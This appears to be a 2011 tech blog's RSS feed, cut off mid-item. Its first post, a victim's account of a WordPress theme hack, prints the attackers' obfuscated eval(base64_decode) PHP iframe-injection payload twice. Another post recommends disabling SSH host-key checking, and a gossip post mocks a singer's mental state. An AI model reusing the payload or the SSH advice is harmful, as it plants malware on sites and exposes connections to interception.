<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
> <channel><title>Techsoar &#187; admin</title> <atom:link href="http://www.techsoar.com/author/admin/feed/" rel="self" type="application/rss+xml" /><link>http://www.techsoar.com</link> <description>Daily updated online technology blog</description> <lastBuildDate>Mon, 05 Dec 2011 03:19:43 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>WordPress gets hacked over and over with eval(base64_decode) code</title><link>http://www.techsoar.com/wordpress-gets-hacked-over-and-over-with-evalbase64_decode-code/</link> <comments>http://www.techsoar.com/wordpress-gets-hacked-over-and-over-with-evalbase64_decode-code/#comments</comments> <pubDate>Tue, 29 Nov 2011 22:45:48 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[Linux]]></category> <guid
isPermaLink="false">http://www.techsoar.com/?p=43684</guid> <description><![CDATA[My websites were getting hacked every 30 minutes or so and when I checked the source code, I kept finding these codes added (below). When I delved more into it, I found out the hackers were using a disabled theme on my blog called: Twenty Eleven 1.2 by the WordPress team Twenty Ten 1.2 by [...]]]></description> <content:encoded><![CDATA[<p>My websites were getting hacked every 30 minutes or so and when I checked the source code, I kept finding these codes added (below). When I delved more into it, I found out the hackers were using a disabled theme on my blog called:<br
/> Twenty Eleven 1.2 by the WordPress team<br
/> Twenty Ten 1.2 by the WordPress team</p><p>They were hitting to same file (index.php) over and over, although I had cleaned up all the other codes they had added, whatever they were sending to index.php was adding everything back to the websites. This attack would fly uncaught since they are adding iframe into the code which wouldn&#8217;t bother you or visitors if it is not interpreted right by your browser (blocked by addons etc.) but if you leave the hole open, they can query database &#8211; extract information, open other holes for themselves and pretty much anything a mutant would do.</p><p>Here is the solution.<br
/> <strong>If you are facing the same situation, you need to find POST logs in access.log. This command:</p><pre class="brush: bash; gutter: true; first-line: 1; highlight: []; html-script: false">#grep POST access.log</pre><p>would allow you to see where they are perpetrating and you need to remove those files.</strong></p><pre class="brush: shell; gutter: true; first-line: 1; highlight: []; html-script: false">
http/access.log:50.73.176.163 - - [29/Nov/2011:00:37:42 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 257
http/access.log:212.122.48.43 - - [29/Nov/2011:01:37:50 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:69.64.46.85 - - [29/Nov/2011:02:37:43 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:79.98.242.246 - - [29/Nov/2011:03:10:09 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:64.90.52.173 - - [29/Nov/2011:03:40:33 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 178
http/access.log:122.248.194.9 - - [29/Nov/2011:04:40:48 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 342
http/access.log:50.57.155.37 - - [29/Nov/2011:06:40:59 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:189.17.169.186 - - [29/Nov/2011:07:41:50 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:195.218.148.226 - - [29/Nov/2011:08:33:45 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 159
http/access.log:84.235.45.241 - - [29/Nov/2011:08:40:15 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:174.142.19.205 - - [29/Nov/2011:09:39:52 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 220
http/access.log:119.75.23.81 - - [29/Nov/2011:10:39:53 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 257
http/access.log:85.13.72.233 - - [29/Nov/2011:11:39:38 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:146.23.176.12 - - [29/Nov/2011:12:39:52 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215</pre><pre class="brush: php; gutter: true; first-line: 1; highlight: []; html-script: false">eval(base64_decode
('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlk
ZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2
h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIu
Y29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycn
JyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdz
em4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2
lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42
OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOT
EuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIp
LA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKS
wNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0K
CWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA
0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXko
IjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS
4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4y
NTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQ
oJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydS
RU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJE
lQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlf
aXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2
lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFr
O30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdG
xQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5
YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1
pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9L
WHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWE
dJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktE
TWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVz
hnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJv
cksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNX
RQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUy
WDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54am
IyOXJhV1Y0ZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lO
VFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1
RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6Tmpjd056Z3pZakl3TnpRMlpq
Y3dNMkV5TURKa016SXpPVE01TXpjM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNek16TURJeU1qQTJPRF
kxTmprMk56WTROelF6WkRJeU16UXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyTVRjMU56TTNNamM0TnpZMk9UWXhNekUyTlRj
d05tUTJOREpsTmpNMk5USmxObVEzTXpKbU5qa3laVGN3TmpnM01ETm1OamMyWmpOa016RXlNak5sTTJNeVpqWTVOalkzTWpZeE5tUTJOVE5sTTJNeVpqWT
BOamszTmpObEp5NXpjR3hwZENnbmZDY3BMREFzZTMwcEtUd3ZjMk55YVhCMFBnPT0iKTsNCn0='));</pre><pre class="brush: php; gutter: true; first-line: 1; highlight: []; html-script: false">eval(base64_decode
('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlk
ZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2
h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIu
Y29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycn
JyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdz
em4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2
lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42
OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOT
EuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIp
LA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKS
wNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0K
CWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA
0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXko
IjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS
4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4y
NTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQ
oJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydS
RU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJE
lQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlf
aXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2
lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFr
O30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdG
xQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5
YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1
pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9L
WHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWE
dJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktE
TWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVz
hnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJv
cksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNX
RQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUy
WDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54am
IyOXJhV1Y0ZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lO
VFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1
RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TVRjd056Z3pZakl3TnpRMlpq
Y3dNMkV5TURKa016SXpPVE01TXpNM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNelF6TURJeU1qQTJPRF
kxTmprMk56WTROelF6WkRJeU16TXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyWmpaaU16VXpOalkzTnpBMlpUYzFNemt6T1Ra
bU1tVTJNelkxTW1VMlpEY3pNbVkyT1RKbE56QTJPRGN3TTJZMk56Wm1NMlF6TVRJeU0yVXpZekptTmprMk5qY3lOakUyWkRZMU0yVXpZekptTmpRMk9UYz
JNMlVuTG5Od2JHbDBLQ2Q4Snlrc01DeDdmU2twUEM5elkzSnBjSFErIik7DQp9'));'));</pre>]]></content:encoded> <wfw:commentRss>http://www.techsoar.com/wordpress-gets-hacked-over-and-over-with-evalbase64_decode-code/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>OpenSSH Windows Known_hosts Problem and SSH-Keygen work around</title><link>http://www.techsoar.com/openssh-windows-known_hosts-problem-and-ssh-keygen-work-around/</link> <comments>http://www.techsoar.com/openssh-windows-known_hosts-problem-and-ssh-keygen-work-around/#comments</comments> <pubDate>Mon, 10 Oct 2011 02:58:35 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[Linux]]></category> <category><![CDATA[Windows]]></category> <guid
isPermaLink="false">http://www.techsoar.com/?p=43680</guid> <description><![CDATA[I have been trying to fix this error: Could not create directory &#8216;/home/xxx/.ssh&#8217;. The authenticity of host can&#8217;t be established. Failed to add the host to the list of known hosts (/home/xxx/.ssh/known_hosts) It is very annoying to type in Yes everytime trying to connect to a server so I decided to do some research but [...]]]></description> <content:encoded><![CDATA[<p>I have been trying to fix this error:</p><p>Could not create directory &#8216;/home/xxx/.ssh&#8217;.<br
/> The authenticity of host can&#8217;t be established.<br
/> Failed to add the host to the list of known hosts (/home/xxx/.ssh/known_hosts)</p><p>It is very annoying to type in Yes everytime trying to connect to a server so I decided to do some research but couldn&#8217;t find solution.</p><p>I found my solution this way:</p><p>-Create  a file in your hard drive (wherever you feel like), I have created mine under: c:\users\myusername\known_hosts (ex: c:\users\john\known_hosts)<br
/> -find ssh_config under OpenSSH\etc\ folder and add this line</p><blockquote><p>UserKnownHostsFile c:/users/john/known_hosts</p></blockquote><p> After you add this line, try to connect and you won&#8217;t have to type in &#8220;Yes&#8221; anymore. If you would like to disable known_hosts file check completely, you can also change this line:<br
/> StrictHostKeyChecking yes</p><p>to</p><blockquote><p>StrictHostKeyChecking no</p></blockquote><p> That will allow you avoid known_hosts from get go.</p><p>If you want to do public key authentication but you are not able to use ssh-keygen to create because you are getting:</p><blockquote><p>Generating public/private rsa key pair.<br
/> Enter file in which to save the key (/home/xxx/.ssh/id_rsa):<br
/> Could not create directory &#8216;/home/xxx/.ssh&#8217;.<br
/> Enter passphrase (empty for no passphrase):<br
/> Enter same passphrase again:<br
/> open /home/xxx/.ssh/id_rsa failed: No such file or directory.<br
/> Saving the key failed: /home/xxx/.ssh/id_rsa.</p></blockquote><p>You can run ssh-keygen uder c:\program files\openssh\bin\ folder  with this:</p><blockquote><p>ssh-keygen -t rsa -f id_rsa</p></blockquote><p>-f switch would allow you to add a filename. Once you create the public and private key (for this example: id_rsa and id_rsa.pub) go back to your c:\program files\openssh\etc\ssh_config file and remove # from<br
/> #IdentityFile ~/.ssh/id_rsa</p><p>and point it to your new file:</p><blockquote><p>IdentityFile c:/program files/openssh/bin/id_rsa</p></blockquote> ]]></content:encoded> <wfw:commentRss>http://www.techsoar.com/openssh-windows-known_hosts-problem-and-ssh-keygen-work-around/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>PayPal Chargeback Process &#8211; Time</title><link>http://www.techsoar.com/paypal-chargeback-process-time/</link> <comments>http://www.techsoar.com/paypal-chargeback-process-time/#comments</comments> <pubDate>Fri, 22 Jul 2011 18:23:36 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[Uncategorized]]></category> <category><![CDATA[chargeback]]></category> <category><![CDATA[paypal]]></category> <guid
isPermaLink="false">http://www.techsoar.com/?p=43676</guid> <description><![CDATA[Please beware, this is true story&#8230; I sold something using PayPal about 4 months ago. It was our mistake that we had shipped the wrong product to the customer. After we received complaints, we requested proof (photo in this case) and tried to work with customer. He/She didn&#8217;t feel secure with the transaction and opened [...]]]></description> <content:encoded><![CDATA[<p>Please beware, this is true story&#8230;</p><p>I sold something using PayPal about 4 months ago. It was our mistake that we had shipped the wrong product to the customer. After we received complaints, we requested proof (photo in this case) and tried to work with customer. He/She didn&#8217;t feel secure with the transaction and opened a dispute with credit card company (AMEX). At that point, we had already reached to an agreement and we had shipped a new product to customer&#8217;s address. However, the dispute became an international problem (sarcasm).</p><p>AMEX and PayPal started 80 days no-talk, no-action dispute resolution process. Customer had already received two products and I had made payments to manufacturer for both products. So I was tripple screwed. I called PayPal multiple times, hearing all their sorry voice and apologies but no result. Customer called AMEX 3 times, no result. So finally, I received an email today saying, <strong>PayPal was able to resolve the situation </strong>in our favour after 80 days of waiting.</p><p>However, PayPal didn&#8217;t do anything to resolve it, the reality of the situation is totally different then as they state in their email.</p><p><strong>PayPal&#8217;s Chargeback process when a dispute issued directly with Credit Card company by a customer</strong>:</p><p>1-Customer calls Credit Card company and opens the dispute<br
/> 2-PayPal dispute resolution center emails you and asks you for evidence<br
/> 3-Upon receiving your evidence, PayPal sends it to AMEX<br
/> 3.1-AMEX puts hold on any payment to PayPal<br
/> 3.2-<strong>!!!PayPal waits for you to do one more transaction. As soon as you try to send money to somebody or make a purchase, they combine all the debt with that transaction and charge your credit card or bank account.</strong> As far as PayPal Chargeback Center told me, if you don&#8217;t make any purchase/transaction on PayPal account, they will for 90 days then start the collection process.<br
/> 4-You are helpless. PayPal recovered her lost and that&#8217;s all they care about.<br
/> 5-Phone calls to PayPal by me and AMEX by customer didn&#8217;t make any difference.</p><p>PayPal Chargeback &#8211; Dispute center clearly told me that after they submit the evidence to credit card company, it is all their decision and PayPal will have to go with that. I asked what PayPal could do if AMEX had decided to hold onto money after 80 days. They said, they would send a courtesy note to the customer on my behalf, to return the product or make another payment but that was all.</p><p>So, as an advise to fellow merchants who would like to use PayPal as a payment option, <strong>do not sell anything more then $100 worth or be ready to lose money. Paypal will not defend your rights or money.</strong></p> ]]></content:encoded> <wfw:commentRss>http://www.techsoar.com/paypal-chargeback-process-time/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Lady Gaga without Make up</title><link>http://www.techsoar.com/lady-gaga-without-make-up/</link> <comments>http://www.techsoar.com/lady-gaga-without-make-up/#comments</comments> <pubDate>Fri, 27 May 2011 16:38:41 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[Uncategorized]]></category> <guid
isPermaLink="false">http://www.techsoar.com/?p=43670</guid> <description><![CDATA[This is a technology blog so please don&#8217;t get me wrong. I&#8217;m not trying to turn into TMZ or ABC but this girl (Lady Gaga) has been such an enourmous media package, it is unbelievable. After Britney Spears and Paris Hilton, they needed some crazy-sociopath-physco edge girl and looks like they had it right there [...]]]></description> <content:encoded><![CDATA[<p>This is a technology blog so please don&#8217;t get me wrong. I&#8217;m not trying to turn into TMZ or ABC but this girl (Lady Gaga) has been such an enourmous media package, it is unbelievable. After Britney Spears and Paris Hilton, they needed some crazy-sociopath-physco edge girl and looks like they had it right there for them. She has physiological and she is definitely being abused by people surrounding her. This is my 2 cents.</p><div
id="attachment_43671" class="wp-caption alignnone" style="width: 258px"><a
href="http://www.techsoar.com/wp-content/uploads/2011/05/lady-gaga-without-makeup.jpg"><img
src="http://www.techsoar.com/wp-content/uploads/2011/05/lady-gaga-without-makeup-248x300.jpg" alt="lady gaga without makeup" title="lady gaga without makeup" width="248" height="300" class="size-medium wp-image-43671" /></a><p
class="wp-caption-text">lady gaga without makeup</p></div> ]]></content:encoded> <wfw:commentRss>http://www.techsoar.com/lady-gaga-without-make-up/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>OpenSSH Error 1067:The process terminated unexpectedly</title><link>http://www.techsoar.com/openssh-error-1067the-process-terminated-unexpectedly/</link> <comments>http://www.techsoar.com/openssh-error-1067the-process-terminated-unexpectedly/#comments</comments> <pubDate>Mon, 25 Oct 2010 03:53:11 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[Windows]]></category> <category><![CDATA[openssh]]></category> <guid
